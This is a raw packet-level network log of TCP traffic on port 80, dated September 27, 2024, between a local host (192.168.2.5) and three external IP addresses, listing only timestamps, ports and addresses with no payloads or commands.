Sep 27, 2024 04:21:16.990813971 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.990847111 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:16.990847111 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:16.992202997 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.992213011 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.992227077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.992244959 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.992249966 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.992259026 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.992264032 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.992274046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.992285967 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.992286921 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.992295980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.992320061 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.992330074 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.992796898 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.992808104 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.992819071 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.992830038 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.992862940 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.992912054 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.992923021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.992933989 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.992940903 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.992945910 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.992957115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.992965937 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.992995024 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.993973970 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.993984938 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.993995905 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.994007111 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.994014978 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.994035006 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.994051933 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.994057894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.994069099 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.994079113 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.994091034 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.994111061 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.994111061 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.994122982 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.994633913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.994642973 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.994654894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.994666100 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.994673967 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.994684935 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.994709015 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.994755983 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.994766951 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.994776964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.994787931 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.994788885 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.994802952 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.994807959 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.994832993 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.994846106 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.994976044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.994987011 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.994997025 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.995012999 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.995023966 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.995151997 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.995162964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.995173931 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.995184898 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.995207071 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.995210886 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.995224953 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.995234966 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.995243073 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.995244980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.995256901 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.995270014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.995270967 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.995295048 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.995301962 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.995309114 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.995315075 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.995326996 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.995337009 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.995338917 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.995347977 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.995366096 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.995378971 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.995918989 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.995929956 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.995942116 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.995949984 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.995968103 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.995985031 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.995991945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.996004105 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.996014118 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.996023893 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.996032000 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.996047974 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.996063948 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.996179104 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.996190071 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.996201992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.996208906 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.996212959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.996222973 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.996227026 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.996237993 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.996243954 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.996251106 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.996270895 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.997236013 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.005620956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.005634069 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.005645990 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.005676031 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.005691051 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.005692005 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.005702972 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.005713940 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.005724907 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.005733967 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.005739927 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.005750895 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.005776882 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.021310091 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021321058 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021327019 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021375895 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.021404028 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021414995 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021425009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021434069 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021442890 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.021445990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021466017 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.021491051 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.021553040 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021586895 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.021621943 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021631956 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021641016 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021660089 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.021675110 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021677017 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.021692038 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021703005 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021712065 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.021743059 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.021765947 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021776915 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021786928 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021804094 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.021822929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.021831989 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021862030 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.021893024 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021904945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021914959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021924973 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.021924973 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.021945953 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.021959066 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.021991968 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.022022009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.022032976 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.022062063 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.022072077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.022083044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.022131920 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.022178888 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.022178888 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.022178888 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.022178888 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.024225950 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.031395912 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.031414032 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.031426907 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.031447887 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.031464100 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.031507015 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.031518936 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.031531096 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.031541109 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.031543016 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.031553030 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.031563997 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.031567097 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.031575918 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.031594038 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.031613111 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.031632900 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.031646967 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.031668901 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.031682968 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.031845093 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.031857014 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.031879902 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.031893969 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.032589912 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.032628059 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.032779932 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.032790899 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.032815933 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.032830000 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.032836914 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.032847881 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.032859087 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.032870054 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.032883883 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.032901049 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.032905102 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.032917023 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.032941103 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.032954931 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.032958031 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.032969952 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.032990932 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.033004999 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.033045053 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.033056974 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.033067942 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.033077955 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.033078909 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.033091068 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.033092976 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.033114910 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.033139944 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.033181906 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.033220053 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.033624887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.033663988 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.033669949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.033682108 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.033704042 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.033718109 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.033746958 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.033759117 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.033781052 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.033796072 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.033813000 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.033823967 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.033834934 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.033853054 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.033868074 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.034821987 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.034862995 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.034885883 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.034895897 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.034929037 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.034936905 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.034940958 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.034962893 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.034990072 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035034895 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035046101 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035057068 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035067081 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035079956 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035095930 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035176039 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035187006 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035198927 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035211086 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035224915 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035239935 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035330057 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035341024 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035351992 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035362005 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035365105 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035389900 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035404921 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035408974 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035420895 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035438061 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035444975 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035449028 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035460949 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035461903 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035474062 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035478115 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035486937 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035497904 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035502911 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035509109 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035521030 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035531044 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035556078 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035574913 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035588980 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035599947 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035613060 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035629988 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035644054 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035645008 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035655975 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035667896 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035679102 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035679102 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035695076 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035713911 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035763979 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035775900 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035785913 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035797119 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035800934 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035825968 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035851002 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035866976 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035877943 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035896063 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.035907030 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035921097 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.035937071 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.039149046 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.039161921 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.039179087 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.039189100 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.039196014 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.039201975 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.039215088 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.039216995 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.039227009 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.039242983 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.039256096 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.039267063 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.039267063 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.039289951 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.039314985 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.039450884 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.039462090 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.039473057 CEST	80	49724	176.113.115.95	192.168.2.5
